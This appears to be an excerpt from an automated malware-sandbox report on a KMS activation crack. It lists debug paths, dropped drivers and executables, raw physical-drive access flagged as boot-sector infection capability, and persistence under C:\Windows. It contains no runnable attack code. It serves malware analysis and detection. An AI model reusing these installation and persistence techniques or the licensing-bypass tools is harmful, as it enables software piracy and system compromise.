Source: Binary string: D:\Daten\Helge\Programmierung\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdb source: 7Z.EXE, 00000022.00000003.1321709735.00000000024C3000.00000004.00000020.00020000.00000000.sdmp, SetACL.exe.34.dr
Source: Binary string: \LookFile\KMDF_LOOK\Release\KMDF_LOOK_32.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: W:\SECOPatcher\temp\Release\x64\SECOPatcher\SECOPatcher.pdb source: 7Z.EXE, 00000022.00000003.1322653977.0000000000750000.00000004.00001000.00020000.00000000.sdmp, 7Z.EXE, 00000022.00000003.1321709735.00000000025E6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: F:\20201028P\KMDF_Protect\Release\KMDF_Protect_32.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\Office\Target\x86\ship\licensing\x-none\CleanO15SPP.pdb source: 7Z.EXE, 00000022.00000003.1321709735.00000000022D9000.00000004.00000020.00020000.00000000.sdmp, cleanospp.exe.34.dr
Source: Binary string: D:\Office\Target\x64\ship\licensing\x-none\CleanO15SPP.pdb source: 7Z.EXE, 00000022.00000003.1321709735.00000000022D9000.00000004.00000020.00020000.00000000.sdmp, cleanospp.exe0.34.dr
Source: Binary string: E:\work\Icon_Report\Release\_service.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, _J8156NOVDEC.exe, 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp, _J8156NOVDEC.exe, 00000002.00000000.1250640362.00000000006E8000.00000002.00000001.01000000.00000005.sdmp, _J8156NOVDEC.exe, 00000002.00000003.1251454537.0000000001566000.00000004.00000020.00020000.00000000.sdmp, J8156NOVDEC.exe, 00000003.00000000.1258172666.0000000000CA8000.00000002.00000001.01000000.00000006.sdmp, J8156NOVDEC.exe, 00000003.00000002.2505697815.0000000000CA8000.00000002.00000001.01000000.00000006.sdmp, _J8156NOVDEC.exe.1.dr, J8156NOVDEC.exe.2.dr, nsjB6CE.tmp.1.dr
Source: Binary string: \LookFile\KMDF_LOOK\Release\KMDF_LOOK_64.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, KMDF_LOOK.sys.1.dr
Source: Binary string: D:\Work\Install_Driver\Driver_helper\Release\wccenter.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, HEU_KMS_Activator.exe, 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp, wccenter.exe.1.dr
Source: Binary string: Z-D:\Work\Install_Driver\Driver_helper\Release\wrme.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000002.1339432193.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe, 00000011.00000000.1272801464.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe.1.dr
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeCode function: 1_2_00405F56 GetModuleHandleA,LoadLibraryA,GetProcAddress,1_2_00405F56
Source: kms-server.exe.34.drStatic PE information: real checksum: 0x0 should be: 0xe21f
Source: kms-client.exe.34.drStatic PE information: real checksum: 0x0 should be: 0x17708
Source: HEU_KMS_Activator.exeStatic PE information: real checksum: 0x0 should be: 0x56291d
Source: SECOPatcher.dll0.34.drStatic PE information: real checksum: 0x0 should be: 0x2906
Source: HEU_KMS_Activator.exe.1.drStatic PE information: real checksum: 0x4d4fb7 should be: 0x4dc854
Source: kms.exe.34.drStatic PE information: real checksum: 0xf4931 should be: 0xfc615
Source: SECOPatcher.dll.34.drStatic PE information: real checksum: 0x0 should be: 0xe02d
Source: System.dll.1.drStatic PE information: real checksum: 0x0 should be: 0x9e55
Source: kms_x64.exe.34.drStatic PE information: real checksum: 0x1108fd should be: 0x117de7
Source: HEU_KMS_Activator.exe.4.drStatic PE information: real checksum: 0x4d4fb7 should be: 0x4dc854
Source: 7Z.EXE.4.drStatic PE information: real checksum: 0x0 should be: 0x93a5b
Source: 7Z.EXE.4.drStatic PE information: section name: .sxdata
Source: msvcr100.dll0.34.drStatic PE information: section name: _CONST
Source: msvcr100.dll0.34.drStatic PE information: section name: text
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006C00C1 push ecx; ret 2_2_006C00D4
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006A62A1 push 00000000h; ret 2_2_006A62A8
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006A6281 push 00000000h; iretd 2_2_006A62A0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_0068C298 pushfd ; retn 0068h2_2_0068C299
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C800C1 push ecx; ret 3_2_00C800D4
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C360EF pushad ; ret 3_2_00C360F2
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C80656 push ecx; ret 3_2_00C80669
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C39C65 pushfd ; ret 3_2_00C39C66
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeCode function: 4_2_00D58AC5 push ecx; ret 4_2_00D58AD8
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: 11_2_0037C284 push ecx; ret 11_2_0037C296
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: 11_2_0037BAF0 push ecx; ret 11_2_0037BB03
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00EB56A6 push ecx; ret 17_2_00EB56B9
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0046CC80 push eax; ret 34_2_0046CCAE
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_00459590 push ecx; mov dword ptr [esp], ecx34_2_00459591
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0046B890 push eax; ret 34_2_0046B8AE
Source: msvcr100.dll.34.drStatic PE information: section name: .text entropy: 6.90903234258047

Persistence and Installation Behavior

barindex
Contains functionality to infect the boot sector
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d2_2_00632A30
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTWithAdminRights ERROR ,CreateFileA(%s) returned INVALID_HANDLE_VALUE2_2_00632A30
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTWithAdminRights ERROR DeviceIoControl() %d, DFP_GET_VERSION) returned 0, error is %d2_2_00632A30
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTWithAdminRights ERROR No device found at iPosition %d (%d)2_2_00632A30
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: CreateFileA,GetLastError,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d2_2_00632CF0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: CreateFileA,GetLastError,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTUsingSmart ERROR, CreateFileA(%s) returned INVALID_HANDLE_VALUE Error Code %d2_2_00632CF0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: CreateFileA,GetLastError,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTUsingSmart ERROR DeviceIoControl(%d, SMART_GET_VERSION) returned 0, error is %d2_2_00632CF0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive%d2_2_006330D0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,DeviceIoControl,GetLastError,CloseHandle, %d ReadPhysicalDriveInNTWithZeroRights ERROR CreateFileA(%s) returned INVALID_HANDLE_VALUE2_2_006330D0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,DeviceIoControl,GetLastError,CloseHandle, %s ReadPhysicalDriveInNTWithZeroRights ERROR DeviceIoControl(), IOCTL_DISK_GET_DRIVE_GEOMETRY_EX) returned 02_2_006330D0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d3_2_00BF2A30
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTWithAdminRights ERROR ,CreateFileA(%s) returned INVALID_HANDLE_VALUE3_2_00BF2A30
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTWithAdminRights ERROR DeviceIoControl() %d, DFP_GET_VERSION) returned 0, error is %d3_2_00BF2A30
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTWithAdminRights ERROR No device found at iPosition %d (%d)3_2_00BF2A30
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: CreateFileA,GetLastError,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d3_2_00BF2CF0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: CreateFileA,GetLastError,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTUsingSmart ERROR, CreateFileA(%s) returned INVALID_HANDLE_VALUE Error Code %d3_2_00BF2CF0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: CreateFileA,GetLastError,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTUsingSmart ERROR DeviceIoControl(%d, SMART_GET_VERSION) returned 0, error is %d3_2_00BF2CF0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive%d3_2_00BF30D0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,DeviceIoControl,GetLastError,CloseHandle, %d ReadPhysicalDriveInNTWithZeroRights ERROR CreateFileA(%s) returned INVALID_HANDLE_VALUE3_2_00BF30D0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,DeviceIoControl,GetLastError,CloseHandle, %s ReadPhysicalDriveInNTWithZeroRights ERROR DeviceIoControl(), IOCTL_DISK_GET_DRIVE_GEOMETRY_EX) returned 03_2_00BF30D0
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeExecutable created and started: C:\Windows\_temp07242019502489\7Z.EXEJump to behavior
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeExecutable created and started: C:\Windows\system32\drivers\DvLayout.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeExecutable created and started: C:\Windows\_temp07242019502489\kms_x64.exeJump to behavior
Sample is not signed and drops a device driver
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeFile created: C:\Windows\system32\drivers\KMDF_LOOK.sysJump to behavior
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeFile created: C:\Windows\system32\drivers\KMDF_Protect.sysJump to behavior
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\x86\SetACL.exeJump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\kms-client.exeJump to dropped file
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeFile created: C:\Users\user\AppData\Local\Temp\nsoB6EE.tmp\System.dllJump to dropped file
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeFile created: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wccenter.exeJump to dropped file
Source: C:\Windows\System32\drivers\DvLayout.exeFile created: C:\Windows\system32\drivers\CbDServices.sys (copy)Jump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\kms-server.exeJump to dropped file
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeFile created: C:\Windows\System32\drivers\DvLayout.exeJump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\kms.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeFile created: C:\Windows\_temp07242019502489\7Z.EXEJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeFile created: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeJump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\x86\cleanospp.exeJump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\x86\SECOPatcher.dllJump to dropped file
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeFile created: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wdlogin.exeJump to dropped file
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeFile created: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeJump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\x86\msvcr100.dllJump to dropped file
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeFile created: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeJump to dropped file
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeFile created: C:\Windows\System32\drivers\KMDF_Protect.sysJump to dropped file
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeFile created: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wuhost.exeJump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\x64\SppExtComObjHook.dllJump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\x64\msvcr100.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeFile created: C:\Windows\HeuKmsRenewal\HEU_KMS_Activator.exeJump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\kms_x64.exeJump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\x64\SetACL.exeJump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\x64\SECOPatcher.dllJump to dropped file
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeFile created: C:\Windows\System32\drivers\KMDF_LOOK.sysJump to dropped file
Source: C:\Windows\System32\drivers\DvLayout.exeFile created: C:\Windows\system32\drivers\mvtnom.sys (copy)Jump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\x64\cleanospp.exeJump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\x86\SppExtComObjHook.dllJump to dropped file
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeFile created: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeJump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\x86\SetACL.exeJump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\x64\SppExtComObjHook.dllJump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\x64\msvcr100.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeFile created: C:\Windows\HeuKmsRenewal\HEU_KMS_Activator.exeJump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\kms-client.exeJump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\kms_x64.exeJump to dropped file
Source: C:\Windows\System32\drivers\DvLayout.exeFile created: C:\Windows\system32\drivers\CbDServices.sys (copy)Jump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\x64\SetACL.exeJump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\kms-server.exeJump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\x64\SECOPatcher.dllJump to dropped file
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeFile created: C:\Windows\System32\drivers\KMDF_LOOK.sysJump to dropped file
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeFile created: C:\Windows\System32\drivers\DvLayout.exeJump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\kms.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeFile created: C:\Windows\_temp07242019502489\7Z.EXEJump to dropped file
Source: C:\Windows\System32\drivers\DvLayout.exeFile created: C:\Windows\system32\drivers\mvtnom.sys (copy)Jump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\x86\cleanospp.exeJump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\x86\SECOPatcher.dllJump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\x64\cleanospp.exeJump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\x86\SppExtComObjHook.dllJump to dropped file
Source: C:\Windows\_temp07242019502489\7Z.EXEFile created: C:\Windows\_temp07242019502489\x86\msvcr100.dllJump to dropped file
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeFile created: C:\Windows\System32\drivers\KMDF_Protect.sysJump to dropped file

Boot Survival

barindex
Contains functionality to infect the boot sector
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d2_2_00632A30
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTWithAdminRights ERROR ,CreateFileA(%s) returned INVALID_HANDLE_VALUE2_2_00632A30
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTWithAdminRights ERROR DeviceIoControl() %d, DFP_GET_VERSION) returned 0, error is %d2_2_00632A30
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTWithAdminRights ERROR No device found at iPosition %d (%d)2_2_00632A30
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: CreateFileA,GetLastError,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d2_2_00632CF0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: CreateFileA,GetLastError,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTUsingSmart ERROR, CreateFileA(%s) returned INVALID_HANDLE_VALUE Error Code %d2_2_00632CF0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: CreateFileA,GetLastError,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTUsingSmart ERROR DeviceIoControl(%d, SMART_GET_VERSION) returned 0, error is %d2_2_00632CF0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive%d2_2_006330D0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,DeviceIoControl,GetLastError,CloseHandle, %d ReadPhysicalDriveInNTWithZeroRights ERROR CreateFileA(%s) returned INVALID_HANDLE_VALUE2_2_006330D0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,DeviceIoControl,GetLastError,CloseHandle, %s ReadPhysicalDriveInNTWithZeroRights ERROR DeviceIoControl(), IOCTL_DISK_GET_DRIVE_GEOMETRY_EX) returned 02_2_006330D0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d3_2_00BF2A30
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTWithAdminRights ERROR ,CreateFileA(%s) returned INVALID_HANDLE_VALUE3_2_00BF2A30
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTWithAdminRights ERROR DeviceIoControl() %d, DFP_GET_VERSION) returned 0, error is %d3_2_00BF2A30
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTWithAdminRights ERROR No device found at iPosition %d (%d)3_2_00BF2A30
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: CreateFileA,GetLastError,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d3_2_00BF2CF0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: CreateFileA,GetLastError,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTUsingSmart ERROR, CreateFileA(%s) returned INVALID_HANDLE_VALUE Error Code %d3_2_00BF2CF0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: CreateFileA,GetLastError,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTUsingSmart ERROR DeviceIoControl(%d, SMART_GET_VERSION) returned 0, error is %d3_2_00BF2CF0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive%d3_2_00BF30D0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,DeviceIoControl,GetLastError,CloseHandle, %d ReadPhysicalDriveInNTWithZeroRights ERROR CreateFileA(%s) returned INVALID_HANDLE_VALUE3_2_00BF30D0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: CreateFileA,DeviceIoControl,DeviceIoControl,GetLastError,CloseHandle, %s ReadPhysicalDriveInNTWithZeroRights ERROR DeviceIoControl(), IOCTL_DISK_GET_DRIVE_GEOMETRY_EX) returned 03_2_00BF30D0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_00631D50 GetModuleFileNameW,CreateEventW,StartServiceCtrlDispatcherW,CloseHandle,Sleep,CopyFileW,Sleep,GetLastError,__CxxThrowException@8,2_2_00631D50
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C7E9BC GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_00C7E9BC
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
